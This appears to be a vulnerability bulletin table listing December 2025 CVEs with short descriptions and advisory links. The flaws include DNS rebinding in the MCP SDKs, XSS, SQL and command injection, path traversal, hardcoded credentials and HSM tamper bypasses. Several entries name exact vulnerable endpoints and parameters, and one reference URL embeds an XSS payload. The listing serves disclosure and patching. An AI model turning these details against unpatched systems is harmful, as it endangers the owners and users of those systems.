| modelcontextprotocol--python-sdk | The MCP Python SDK, called `mcp` on PyPI, is a Python implementation of the Model Context Protocol (MCP). Prior to version 1.23.0, tThe Model Context Protocol (MCP) Python SDK does not enable DNS rebinding protection by default for HTTP-based servers. When an HTTP-based MCP server is run on localhost without authentication using FastMCP with streamable HTTP or SSE transport, and has not configured TransportSecuritySettings, a malicious website could exploit DNS rebinding to bypass same-origin policy restrictions and send requests to the local MCP server. This could allow an attacker to invoke tools or access resources exposed by the MCP server on behalf of the user in those limited circumstances. Note that running HTTP-based MCP servers locally without authentication is not recommended per MCP security best practices. This issue does not affect servers using stdio transport. This vulnerability is fixed in 1.23.0. | 2025-12-02 | not yet calculated | CVE-2025-66416 | https://github.com/modelcontextprotocol/python-sdk/security/advisories/GHSA-9h52-p55h-vw2f https://github.com/modelcontextprotocol/python-sdk/commit/d3a184119e4479ea6a63590bc41f01dc06e3fa99 |
| modelcontextprotocol--typescript-sdk | MCP TypeScript SDK is the official TypeScript SDK for Model Context Protocol servers and clients. Prior to 1.24.0, The Model Context Protocol (MCP) TypeScript SDK does not enable DNS rebinding protection by default for HTTP-based servers. When an HTTP-based MCP server is run on localhost without authentication with StreamableHTTPServerTransport or SSEServerTransport and has not enabled enableDnsRebindingProtection, a malicious website could exploit DNS rebinding to bypass same-origin policy restrictions and send requests to the local MCP server. This could allow an attacker to invoke tools or access resources exposed by the MCP server on behalf of the user in those limited circumstances. Note that running HTTP-based MCP servers locally without authentication is not recommended per MCP security best practices. This issue does not affect servers using stdio transport. This vulnerability is fixed in 1.24.0. | 2025-12-02 | not yet calculated | CVE-2025-66414 | https://github.com/modelcontextprotocol/typescript-sdk/security/advisories/GHSA-w48q-cv73-mx4w https://github.com/modelcontextprotocol/typescript-sdk/commit/09623e2aa5044f9e9da62c73d820a8250b9d97ed |
| monkeytypegame--monkeytype | Monkeytype is a minimalistic and customizable typing test. In 25.49.0 and earlier, there is improper handling of user input which allows an attacker to execute malicious javascript on anyone viewing a malicious quote submission. quote.text and quote.source are user input, and they're inserted straight into the DOM. If they contain HTML tags, they will be rendered (after some escaping using quotes and textarea tags). | 2025-12-04 | not yet calculated | CVE-2025-66563 | https://github.com/monkeytypegame/monkeytype/security/advisories/GHSA-mfjh-9552-8g27 https://github.com/monkeytypegame/monkeytype/commit/d6d062a77132ba7d6ba3b482d46ae329d3b8d695 |
| mozilla--rhino | Rhino is an open-source implementation of JavaScript written entirely in Java. Prior to 1.8.1, 1.7.15.1, and 1.7.14.1, when an application passed an attacker controlled float poing number into the toFixed() function, it might lead to high CPU consumption and a potential Denial of Service. Small numbers go through this call stack: NativeNumber.numTo > DToA.JS_dtostr > DToA.JS_dtoa > DToA.pow5mult where pow5mult attempts to raise 5 to a ridiculous power. This vulnerability is fixed in 1.8.1, 1.7.15.1, and 1.7.14.1. | 2025-12-03 | not yet calculated | CVE-2025-66453 | https://github.com/mozilla/rhino/security/advisories/GHSA-3w8q-xq97-5j7x |
| n/a-- Aquarius HelperTool (1.0.003) privileged XPC service on macOS | The Aquarius HelperTool (1.0.003) privileged XPC service on macOS contains multiple flaws that allow local privilege escalation. The service accepts XPC connections from any local process without validating the client's identity, and its authorization logic incorrectly calls AuthorizationCopyRights with a NULL reference, causing all authorization checks to succeed. The executeCommand:authorization:withReply: method then interpolates attacker-controlled input into NSTask and executes it with root privileges. A local attacker can exploit these weaknesses to run arbitrary commands as root, create persistent backdoors, or obtain a fully interactive root shell. | 2025-12-03 | not yet calculated | CVE-2025-65842 | https://almightysec.com/helpertool-xpc-service-local-privilege-escalation/ |
| n/a--Abacre Restaurant Point of Sale (POS) up to 15.0.0.1656 | Abacre Restaurant Point of Sale (POS) up to 15.0.0.1656 are vulnerable to Cleartext Storage of Sensitive Information in Memory. The application leaves valid device-bound license keys in process memory during an activation attempt. | 2025-12-03 | not yet calculated | CVE-2025-65320 | https://github.com/Smarttfoxx/CVE-2025-- https://packetstorm.news/files/id/212149 |
| n/a--Akamai Ghost on Akamai CDN edge servers before 2025-11-17 | Akamai Ghost on Akamai CDN edge servers before 2025-11-17 has a chunked request body processing error that can result in HTTP request smuggling. When Akamai Ghost receives an invalid chunked body that includes a chunk size different from the actual size of the following chunk data, under certain circumstances, Akamai Ghost erroneously forwards the invalid request and subsequent superfluous bytes to the origin server. An attacker could hide a smuggled request in these superfluous bytes. Whether this is exploitable depends on the origin server's behavior and how it processes the invalid request it receives from Akamai Ghost. | 2025-12-04 | not yet calculated | CVE-2025-66373 | https://en.wikipedia.org/wiki/HTTP_request_smuggling https://www.akamai.com/blog/security/cve-2025-66373-http-request-smuggling-chunked-body-size |
| n/a--alexusmai laravel-file-manager 3.3.1 | alexusmai laravel-file-manager 3.3.1 and below is vulnerable to Directory Traversal. The zip/archiving functionality allows an attacker to create archives containing files and directories outside the intended scope due to improper path validation. | 2025-12-03 | not yet calculated | CVE-2025-65345 | https://github.com/alexusmai/laravel-file-manager https://github.com/tlekrean/CVE-2025-65345 |
| n/a--alexusmai laravel-file-manager 3.3.1 | alexusmai laravel-file-manager 3.3.1 and below is vulnerable to Directory Traversal. The unzip/extraction functionality improperly allows archive contents to be written to arbitrary locations on the filesystem due to insufficient validation of extraction paths. | 2025-12-04 | not yet calculated | CVE-2025-65346 | https://github.com/alexusmai/laravel-file-manager https://github.com/Theethat-Thamwasin/CVE-2025-65346 |
| n/a--Alinto Sogo 5.12.3 | Alinto Sogo 5.12.3 is vulnerable to Cross Site Scripting (XSS) via the theme parameter. | 2025-12-04 | not yet calculated | CVE-2025-63499 | https://github.com/poblaguev-tot/CVE-2025-63499 https://email.example.com/SOGo/so/victim@example.com/Mail/view?theme=%27%3CScRiPt%20%3Ealert%289998%29%3C%2FScRiPt%3E |
| n/a--ALL-RUT22GW v3.3.8 | ALLNET ALL-RUT22GW v3.3.8 was discovered to store hardcoded credentials in the libicos.so library. | 2025-12-04 | not yet calculated | CVE-2025-29268 | http://all-rut22gw.com http://allnet.com https://blog.byteray.co.uk/critical-vulnerabilities-in-rut22gw-industrial-lte-cellular-routers-f4eb8768feb7?gi=f74ff4eb9f22 |
| n/a--ALL-RUT22GW v3.3.8 | ALLNET ALL-RUT22GW v3.3.8 was discovered to contain an OS command injection vulnerability via the command parameter in the popen.cgi endpoint. | 2025-12-04 | not yet calculated | CVE-2025-29269 | http://all-rut22gw.com http://allnet.com https://blog.byteray.co.uk/critical-vulnerabilities-in-rut22gw-industrial-lte-cellular-routers-f4eb8768feb7?gi=f74ff4eb9f22 |
| n/a--ApiPayController.java of platform v1.0.0 | Incorrect access control in the component ApiPayController.java of platform v1.0.0 allows attackers to access sensitive information via unspecified vectors. | 2025-12-04 | not yet calculated | CVE-2025-57210 | https://gitee.com/fuyang_lipengjun/platform https://gist.github.com/xueye0629/4411663241fa3bbba628d3044dc50451 |
| n/a--ApiPayController.java of platform v1.0.0 | Incorrect access control in the component ApiOrderService.java of platform v1.0.0 allows attackers to access sensitive information via a crafted request. | 2025-12-04 | not yet calculated | CVE-2025-57212 | https://gitee.com/fuyang_lipengjun/platform https://gist.github.com/xueye0629/85730f2317cfac2796fe5e23da3ae399 |
| n/a--Aquarius Desktop 3.0.069 | Aquarius Desktop 3.0.069 for macOS contains an insecure file handling vulnerability in its support data archive generation feature. The application follows symbolic links placed inside the ~/Library/Logs/Aquarius directory and treats them as regular files. When building the support ZIP, Aquarius recursively enumerates logs using a JUCE directory iterator configured to follow symlinks, and later writes file data without validating whether the target is a symbolic link. A local attacker can exploit this behavior by planting symlinks to arbitrary filesystem locations, resulting in unauthorized disclosure or modification of arbitrary files. When chained with the associated HelperTool privilege escalation issue, root-owned files may also be exposed. | 2025-12-03 | not yet calculated | CVE-2025-65843 | https://almightysec.com/insecure-file-handling-via-symlink/ |
| n/a--Aquarius Desktop 3.0.069 for macOS | Aquarius Desktop 3.0.069 for macOS stores user authentication credentials in the local file ~/Library/Application Support/Aquarius/aquarius.settings using a weak obfuscation scheme. The password is "encrypted" through predictable byte-substitution that can be trivially reversed, allowing immediate recovery of the plaintext value. Any attacker who can read this settings file can fully compromise the victim's Aquarius account by importing the stolen configuration into their own client or login through the vendor website. This results in complete account takeover, unauthorized access to cloud-synchronized data, and the ability to perform authenticated actions as the user. | 2025-12-03 | not yet calculated | CVE-2025-65841 | http://acustica.com http://aquarius.com https://almightysec.com/account-takeover-via-weak-encryption/ |
| n/a--Authentication Bypass via Hardcoded Credentials GoAway up to v0.62.18 | Authentication Bypass via Hardcoded Credentials GoAway up to v0.62.18, fixed in 0.62.19, uses a hardcoded secret for signing JWT tokens used for authentication. | 2025-12-05 | not yet calculated | CVE-2025-65730 | https://github.com/pommee/goaway/releases/tag/v0.62.16 https://github.com/pommee/goaway/blob/v0.62.18/backend/api/middleware.go#L15 https://github.com/pommee/goaway/blob/v0.62.18/backend/api/middleware.go#L110 https://github.com/pommee/goaway/blob/v0.62.18/backend/api/middleware.go#L69 https://github.com/pommee/goaway/blob/v0.62.18/backend/api/auth.go#L48 https://github.com/pommee/goaway/blob/v0.62.18/backend/api/middleware.go#L88 https://github.com/pommee/goaway/blob/v0.62.18/backend/api/middleware.go#L40 https://github.com/pommee/goaway/commit/5769f8782b7453ca1c22a201b224b5ce48532f64#diff-4ddfd6cf1311ddfd45734bb1dc53bc208df69584ba92ac4f38866bd558434678L15-L40 https://github.com/gian2dchris/CVEs/tree/CVE-2025-65730/CVE-2025-65730 |
| n/a--AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 | AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 was discovered to contain an authenticated command injection vulnerability in the Machine.cgi endpoint. This vulnerability allows attackers to execute arbitrary commands via a crafted input. | 2025-12-03 | not yet calculated | CVE-2025-57198 | http://avtech.com http://dgm1104.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2025-57198 |
| n/a--AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 | AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 was discovered to contain an authenticated command injection vulnerability in the NetFailDetectD binary. This vulnerability allows attackers to execute arbitrary commands via a crafted input. | 2025-12-03 | not yet calculated | CVE-2025-57199 | http://avtech.com http://dgm1104.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2025-57199 |
| n/a--AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 | AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 was discovered to contain an authenticated command injection vulnerability in the test_mail function. This vulnerability allows attackers to execute arbitrary commands via a crafted input. | 2025-12-03 | not yet calculated | CVE-2025-57200 | http://avtech.com http://dgm1104.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2025-57200 |
| n/a--AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 | AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 was discovered to contain an authenticated command injection vulnerability in the SMB server function. This vulnerability allows attackers to execute arbitrary commands via a crafted input. | 2025-12-03 | not yet calculated | CVE-2025-57201 | http://avtech.com http://dgm1104.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2025-57201 |
| n/a--AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 | A stored cross-site scripting (XSS) vulnerability in the PwdGrp.cgi endpoint of AVTECH SECURITY Corporation DGM1104 FullImg-1015-1004-1006-1003 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the username field. | 2025-12-03 | not yet calculated | CVE-2025-57202 | http://avtech.com http://dmg1104.com https://github.com/xchg-rax-rax/vulnerability-research/tree/main/CVE-2025-57202 |
| n/a--Bluetooth Human Interface Device (HID) of JXL 9 Inch Car Android Double Din Player Android v12.0 | An issue in the Bluetooth Human Interface Device (HID) of JXL 9 Inch Car Android Double Din Player Android v12.0 allows attackers to inject arbitrary keystrokes via a spoofed Bluetooth HID device. | 2025-12-04 | not yet calculated | CVE-2025-63896 | http://jxl.com https://github.com/thorat-shubham/JXL_Infotainment_CVE/blob/main/README.md |
| n/a--Calibre-Web v0.6.25 | A Stored Cross-Site Scripting (XSS) vulnerability in Calibre-Web v0.6.25 allows attackers to inject malicious JavaScript into the 'username' field during user creation. The payload is stored unsanitized and later executed when the /ajax/listusers endpoint is accessed. | 2025-12-02 | not yet calculated | CVE-2025-65858 | https://github.com/KhanhDuy155/calibre-web-CVE-2025-65858/blob/main/CVE-2025-65858.md |
| n/a--CiviCRM before v6.7 | A Stored Cross Site Scripting vulnerability exists in CiviCRM before v6.7 in the Accounting Batches field. An authenticated user can inject malicious JavaScript into this field and it executes whenever the page is viewed. | 2025-12-02 | not yet calculated | CVE-2025-65187 | https://civicrm.com/ https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65187.pdf |
| n/a--code-projects Online Medicine Guide 1.0 | code-projects Online Medicine Guide 1.0 is vulnerable to SQL Injection in /login.php via the upass parameter. | 2025-12-02 | not yet calculated | CVE-2025-60736 | https://github.com/WinDyAlphA/CVE-2025-60736 |
| n/a--ComposioHQ v.0.7.20 | Directory Traversal vulnerability in ComposioHQ v.0.7.20 allows a remote attacker to obtain sensitive information via the _download_file_or_dir function. | 2025-12-04 | not yet calculated | CVE-2025-56427 | https://github.com/ComposioHQ/composio/blob/master/python/composio/server/api.py#L278 https://github.com/TOAST-Research/pocs/blob/main/composio/composio_1.md |
| n/a--D-Link R15 (AX1500) 1.20.01 | A vulnerability has been found in D-Link R15 (AX1500) 1.20.01 and below. By manipulating the model name parameter during a password change request in the web administrator page, it is possible to trigger a command injection in httpd. | 2025-12-02 | not yet calculated | CVE-2025-60854 | https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10473 |
| n/a--dcat-admin v2.2.3-beta and before | dcat-admin v2.2.3-beta and before is vulnerable to file inclusion in admin/src/Extend/VersionManager.php. | 2025-12-02 | not yet calculated | CVE-2025-65656 | https://github.com/jqhph/dcat-admin https://github.com/lznlol/operation-log/blob/main/CVE-2025-65656.md |
| n/a--DeepSeek V3.2 | DeepSeek V3.2 has a Cross Site Scripting (XSS) vulnerability, which allows JavaScript execution through model-generated SVG content. | 2025-12-02 | not yet calculated | CVE-2025-63872 | https://medium.com/@vinitkundu14/cve-2025-63872-svg-based-xss-in-deepseek-chat-v3-2-db4ebc1f1f28 |
| n/a--E-POINT CMS eagle.gsam-1169.1 | The E-POINT CMS eagle.gsam-1169.1 file upload feature improperly handles nested archive files. An attacker can upload a nested ZIP (a ZIP containing another ZIP) where the inner archive contains an executable file (e.g. webshell.php). When the application extracts the uploaded archives, the executable may be extracted into a web-accessible directory. This can lead to remote code execution (RCE), data disclosure, account compromise, or further system compromise depending on the web server/process privileges. The issue arises from insufficient validation of archive contents and inadequate restrictions on extraction targets. | 2025-12-04 | not yet calculated | CVE-2025-65806 | https://www.e-point.pl/produkty/e-point-cms https://github.com/Bidon47/CVE-2025-65806/blob/main/CVE-2025-65806.md |
| n/a--Edoc-doctor-appointment-system v1.0.1 | Edoc-doctor-appointment-system v1.0.1 was discovered to contain SQl injection vulnerability via the 'docid' parameter at /admin/appointment.php. | 2025-12-02 | not yet calculated | CVE-2025-65358 | https://github.com/HashenUdara/edoc-doctor-appointment-system https://github.com/omkaryepre/vulnerability-research/tree/main/CVE-2025-65358 |
| n/a--EduplusCampus 3.0.1 | An Insecure Direct Object Reference (IDOR) vulnerability in the EduplusCampus 3.0.1 Student Payment API allows authenticated users to access other students personal and financial records by modifying the 'rec_no' parameter in the /student/get-receipt endpoint. | 2025-12-04 | not yet calculated | CVE-2025-61148 | https://drive.google.com/file/d/1BRZRurbl7TY6KU4uaelAUn7L9Cn6XfjC/view?usp=sharing https://medium.com/@Charon19d/how-i-hacked-all-universities-in-my-city-d6b8e320455c https://github.com/sharma19d/CVE-2025-61148 |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | The Chassis Management Board in Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allows a physically proximate attacker to obtain debug access and escalate privileges by bypassing the tamper label and opening the chassis without leaving evidence, and accessing the JTAG connector. This is called F02. | 2025-12-02 | not yet calculated | CVE-2025-59693 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | The Chassis Management Board in Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allows a physically proximate attacker to persistently modify firmware and influence the (insecurely configured) appliance boot process. To exploit this, the attacker must modify the firmware via JTAG or perform an upgrade to the chassis management board firmware. This is called F03. | 2025-12-02 | not yet calculated | CVE-2025-59694 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a user with OS root access to alter firmware on the Chassis Management Board (without Authentication). This is called F04. | 2025-12-02 | not yet calculated | CVE-2025-59695 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker to modify or erase tamper events via the Chassis management board. | 2025-12-02 | not yet calculated | CVE-2025-59696 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker to escalate privileges by editing the Legacy GRUB bootloader configuration to start a root shell upon boot of the host OS. This is called F06. | 2025-12-02 | not yet calculated | CVE-2025-59697 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, might allow a physically proximate attacker to gain access to the EOL legacy bootloader. | 2025-12-02 | not yet calculated | CVE-2025-59698 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker to escalate privileges by booting from a USB device with a valid root filesystem. This occurs because of insecure default settings in the Legacy GRUB Bootloader. | 2025-12-02 | not yet calculated | CVE-2025-59699 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker with root access to modify the Recovery Partition (because of a lack of integrity protection). | 2025-12-02 | not yet calculated | CVE-2025-59700 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker (with elevated privileges) to read and modify the Appliance SSD contents (because they are unencrypted). | 2025-12-02 | not yet calculated | CVE-2025-59701 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a physically proximate attacker with elevated privileges to falsify tamper events by accessing internal components. | 2025-12-02 | not yet calculated | CVE-2025-59702 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a Physically Proximate Attacker to access the internal components of the appliance, without leaving tamper evidence. To exploit this, the attacker needs to remove the tamper label and all fixing screws from the device without damaging it. This is called an F14 attack. | 2025-12-02 | not yet calculated | CVE-2025-59703 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow an attacker to gain access the the BIOS menu because is has no password. | 2025-12-02 | not yet calculated | CVE-2025-59704 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7 | Entrust nShield Connect XC, nShield 5c, and nShield HSMi through 13.6.11, or 13.7, allow a Physically Proximate Attacker to Escalate Privileges by enabling the USB interface through chassis probe insertion during system boot, aka "Unauthorized Reactivation of the USB interface" or F01. | 2025-12-02 | not yet calculated | CVE-2025-59705 | https://www.entrust.com/use-case/why-use-an-hsm https://github.com/google/security-research/security/advisories/GHSA-6q4x-m86j-gfwj |
| n/a--ERPNext v15.83.2 and Frappe Framework v15.86.0 | In ERPNext v15.83.2 and Frappe Framework v15.86.0, improper validation of uploaded SVG avatar images allows attackers to embed malicious JavaScript. The payload executes when an administrator clicks the image link to view the avatar, resulting in stored cross-site scripting (XSS). Successful exploitation may lead to account takeover, privilege escalation, or full compromise of the affected ERPNext instance. | 2025-12-03 | not yet calculated | CVE-2025-65267 | https://github.com/frappe/frappe https://github.com/frappe/erpnext https://github.com/PhDg1410/CVE/tree/main/CVE-2025-65267 |
| n/a--EverShop 2.0.1 | EverShop 2.0.1 allows a remote unauthenticated attacker to upload arbitrary files and create directories via the /api/images endpoint. The endpoint is accessible without authentication by default, and server-side validation of uploaded files is insufficient. This can be abused to upload arbitrary content (including non-image files) which could impersonate user/admin login panels (exfiltrating credentials) and to perform a denial-of-service attack by exhausting disk space. | 2025-12-02 | not yet calculated | CVE-2025-65844 | https://github.com/evershopcommerce/evershop/issues/819 |
| n/a--Eximbills Enterprise 4.1.5 (Built on 2020-10-30) | Eximbills Enterprise 4.1.5 (Built on 2020-10-30) is vulnerable to authenticated stored cross-site scripting (CWE-79) via the /EximBillWeb/servlets/WSTrxManager endpoint. Unsanitized user input in the TMPL_INFO parameter is stored server-side and rendered to other users, enabling arbitrary JavaScript execution in their browsers. | 2025-12-01 | not yet calculated | CVE-2025-64030 | https://chinasystems.com/whatwedo/ee https://0xy37.medium.com/stored-xss-in-chinasystems-eximbills-enterprise-v4-1-5-f8f5a79c4f0b |
| n/a--eyoucms v1.7.1 | XML external entity (XXE) injection in eyoucms v1.7.1 allows remote attackers to cause a denial of service via crafted body of a POST request. | 2025-12-03 | not yet calculated | CVE-2025-65868 | https://github.com/weng-xianhu/eyoucms/issues/66 |
| n/a--Fanvil x210 V2 2.12.20 | An issue was discovered in Fanvil x210 V2 2.12.20 allowing unauthenticated attackers on the local network to execute arbitrary system commands. | 2025-12-05 | not yet calculated | CVE-2025-64052 | http://fanvil.com https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64052.md |
| n/a--Fanvil x210 V2 2.12.20 | A Buffer overflow vulnerability on Fanvil x210 2.12.20 devices allows attackers to cause a denial of service or potentially execute arbitrary commands via crafted POST request to the /cgi-bin/webconfig?page=upload&action=submit endpoint. | 2025-12-05 | not yet calculated | CVE-2025-64053 | http://fanvil.com https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64053.md |
| n/a--Fanvil x210 V2 2.12.20 | A reflected Cross Site Scripting (XSS) vulnerability on Fanvil x210 2.12.20 devices allows attackers to cause a denial of service or potentially execute arbitrary commands via crafted POST request to the /cgi-bin/webconfig?page=upload&action=submit endpoint. | 2025-12-05 | not yet calculated | CVE-2025-64054 | http://fanvil.com https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64054.md |
| n/a--Fanvil x210 V2 2.12.20 | An issue was discovered in Fanvil x210 V2 2.12.20 allowing unauthenticated attackers on the local network to access administrative functions of the device (e.g. file upload, firmware update, reboot...) via a crafted authentication bypass. | 2025-12-03 | not yet calculated | CVE-2025-64055 | http://fanvil.com https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64055.md |
| n/a--Fanvil x210 V2 2.12.20 | File upload vulnerability in Fanvil x210 V2 2.12.20 allows unauthenticated attackers on the local network to store arbitrary files on the filesystem. | 2025-12-05 | not yet calculated | CVE-2025-64056 | http://fanvil.com https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64056.md |
| n/a--Fanvil x210 V2 2.12.20 | Directory traversal vulnerability in Fanvil x210 V2 2.12.20 allows unauthenticated attackers on the local network to store files in arbitrary locations and potentially modify the system configuration or other unspecified impacts. | 2025-12-05 | not yet calculated | CVE-2025-64057 | http://fanvil.com https://github.com/SpikeReply/advisories/blob/main/cve/fanvil/cve-2025-64057.md |
| n/a--FeehiCMS 2.1.1 | Cross Site Scripting (XSS) vulnerability in FeehiCMS 2.1.1 via the id parameter of the User Update function (?r=user%2Fupdate). | 2025-12-01 | not yet calculated | CVE-2025-63520 | https://github.com/liufee/cms/issues/74 https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63520.md |
| n/a--FeehiCMS 2.1.1 | Reverse Tabnabbing vulnerability in FeehiCMS 2.1.1 in the Comments Management function | 2025-12-01 | not yet calculated | CVE-2025-63522 | https://github.com/liufee/cms/issues/76 https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63522.md |
| n/a--FeehiCMS 2.1.1 | FeehiCMS version 2.1.1 fails to enforce server-side immutability for parameters that are presented to clients as "read-only." An authenticated attacker can intercept and modify the parameter in transit and the backend accepts the changes. This can lead to unintended username changes. | 2025-12-01 | not yet calculated | CVE-2025-63523 | https://github.com/liufee/cms/issues/77 https://github.com/kiwi865/CVEs/blob/main/CVE-2025-63523.md |
| n/a--FeehiCMS version 2.1.1 | FeehiCMS version 2.1.1 has a Remote Code Execution via Unrestricted File Upload in Ad Management. FeehiCMS version 2.1.1 allows authenticated remote attackers to upload files that the server later executes (or stores in an executable location) without sufficient validation, sanitization, or execution restrictions. An authenticated remote attacker can upload a crafted PHP file and cause the application or web server to execute it, resulting in remote code execution (RCE). | 2025-12-02 | not yet calculated | CVE-2025-65657 | https://github.com/liufee/cms/issues/78 https://github.com/kiwi865/CVEs/blob/main/CVE-2025-65657.md |
| n/a--Genexis Platinum P4410 router (Firmware P4410-V2-1.41) | A vulnerability has been identified in Genexis Platinum P4410 router (Firmware P4410-V2-1.41) that allows a local network attacker to achieve Remote Code Execution (RCE) with root privileges. The issue occurs due to improper session invalidation after administrator logout. When an administrator logs out, the session token remains valid. An attacker on the local network can reuse this stale token to send crafted requests via the router's diagnostic endpoint, resulting in command execution as root. | 2025-12-04 | not yet calculated | CVE-2025-65883 | https://0xw41th.medium.com/my-first-cve-cve-2025-65883-remote-code-execution-in-a-genexis-router-0c35749a99bd |
| n/a--github.com/sirupsen/logrus when using Entry.Writer() | A denial-of-service vulnerability exists in github.com/sirupsen/logrus when using Entry.Writer() to log a single-line payload larger than 64KB without newline characters. Due to limitations in the internal bufio.Scanner, the read fails with "token too long" and the writer pipe is closed, leaving Writer() unusable and causing application unavailability (DoS). This affects versions < 1.8.3, 1.9.0, and 1.9.2. The issue is fixed in 1.8.3, 1.9.1, and 1.9.3+, where the input is chunked and the writer continues to function even if an error is logged. | 2025-12-04 | not yet calculated | CVE-2025-65637 | https://github.com/mjuanxd/logrus-dos-poc https://github.com/sirupsen/logrus/issues/1370 https://github.com/sirupsen/logrus/pull/1376 https://github.com/sirupsen/logrus/releases/tag/v1.8.3 https://github.com/sirupsen/logrus/releases/tag/v1.9.1 https://github.com/sirupsen/logrus/releases/tag/v1.9.3 https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMSIRUPSENLOGRUS-5564391 https://github.com/mjuanxd/logrus-dos-poc/blob/main/README.md |
| n/a--Grav CMS 1.7.49 | Grav CMS 1.7.49 is vulnerable to Cross Site Scripting (XSS). The page editor allows authenticated users to edit page content via a Markdown editor. The editor fails to properly sanitize <script> tags, allowing stored XSS payloads to execute when pages are viewed in the admin interface. | 2025-12-02 | not yet calculated | CVE-2025-65186 | https://github.com/getgrav/grav https://github.com/lukehebe/Vulnerability-Disclosures/blob/main/CVE-2025-65186.pdf |
| n/a--HCL Technologies Limited HCLTech DRAGON before v.7.6.0 | Cross Site Scripting vulnerability in HCL Technologies Limited HCLTech DRAGON before v.7.6.0 allows a remote attacker to execute arbitrary code via missing directives | 2025-12-03 | not yet calculated | CVE-2025-63401 | http://hcltech.com http://hcl.com https://excalibur-hcl.my.salesforce.com/sfc/p/#U0000000YO14/a/Pf000003dyQn/x0oUOgfHG6F0wUhpmSMcmXMuwO2GYuSf_duzWPRebao |
